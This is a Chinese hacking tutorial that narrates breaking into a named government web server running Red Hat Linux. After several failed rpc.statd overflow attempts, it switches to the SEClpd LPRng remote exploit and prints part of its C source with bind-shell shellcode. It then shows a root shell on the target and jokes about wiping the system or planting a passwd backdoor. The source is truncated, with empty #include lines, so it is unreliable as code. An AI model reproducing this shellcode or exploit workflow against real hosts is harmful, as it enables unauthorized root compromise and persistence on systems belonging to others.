RedHat Linux 操作系统的入侵_安全中国_全球最大网络安全培训门户

看来并不支持RH7。怎么办？？让俺把0-2全部试试看再说！start……

bash-2.04$stat -d 0 www.fbi.gov.tw
buffer: 0xbffff314 length: 999 (+str/+nul)
target: 0xbffff718 new: 0xbffff56c (offset: 600)
wiping 9 dwords
Failed - statd returned res_stat: (failure) state: 21

哈哈受到挫折，再试……

bash-2.04$stat -d 1 www.fbi.gov.tw
buffer: 0xbffff314 length: 999 (+str/+nul)
target: 0xbffff718 new: 0xbffff56c (offset: 600)
wiping 9 dwords
Failed - statd returned res_stat: (failure) state: 21

一样！继续……

bash-2.04$stat -d 1 www.fbi.gov.tw
buffer: 0xbffff314 length: 999 (+str/+nul)
target: 0xbffff718 new: 0xbffff56c (offset: 600)
wiping 9 dwords
Failed - statd returned res_stat: (failure) state: 21

我烤！！烤烤烤！rpc.statd行不通啊！让我想想看……RH7应该有个远程溢出……好像是lp服务造成的。让俺去找找看。哈哈~~找到了……“seclpd.c”应该是这个东东了。以下程序也可以在黑盟下载。

—————以下代码仅供教学使用，决不能用来进行恶意攻击—————
/*
* Welcome to http://hlc.cnroot.com/
* Run: ./SEClpd victim brute -t type
* Try first ./SEClpd victim -t 0 then try the brute.
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define ADDRESS_BUFFER_SIZE 32+4
#define APPEND_BUFFER_SIZE 52
#define FORMAT_LENGTH 512-8
#define NOPCOUNT 200
#define SHELLCODE_COUNT 1030
#define DELAY 50000 /* usecs */
#define OFFSET_LIMIT 5000

char shellcode[] =
"\x31\xdb\x31\xc9\x31\xc0\xb0\x46\xcd\x80"
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

哈哈~~brute暴力破解。看你出不出shell！现在要等上一会儿……去泡杯coffee慢慢来。（什么！没coffee？tea！这个也行！）…………过了大约一杯coffee的时间。也就是5-8分钟左右，就会有结果了。（什么！什么！5-8分钟你喝了5杯！我倒~~~）……出来了。哈哈~~

- [+] shell located on www.fbi.gov.tw
- [+] Enter Commands at will

Linux FBI.WWW 2.2.16-22smp #1 SMP Tue Aug 22 16:39:21 EDT 2000 i686 unknown
uid=0(root) gid=7(lp)

Well……哈哈~uid=0(root)哇哈哈哈哈…………先在你是root啦！可以为所欲为了~~把它的东西全部删了~~哈哈……太过火了~~还是在passwd中加个后门算了~~至于怎么加，这就不在本文的范围内了……^___^

Good Luck………………

Written By GoGo from H.L.C
/*中华黑盟版权所有，转载请注明出处!http://hlc.cnroot.com*/

上一页 1 2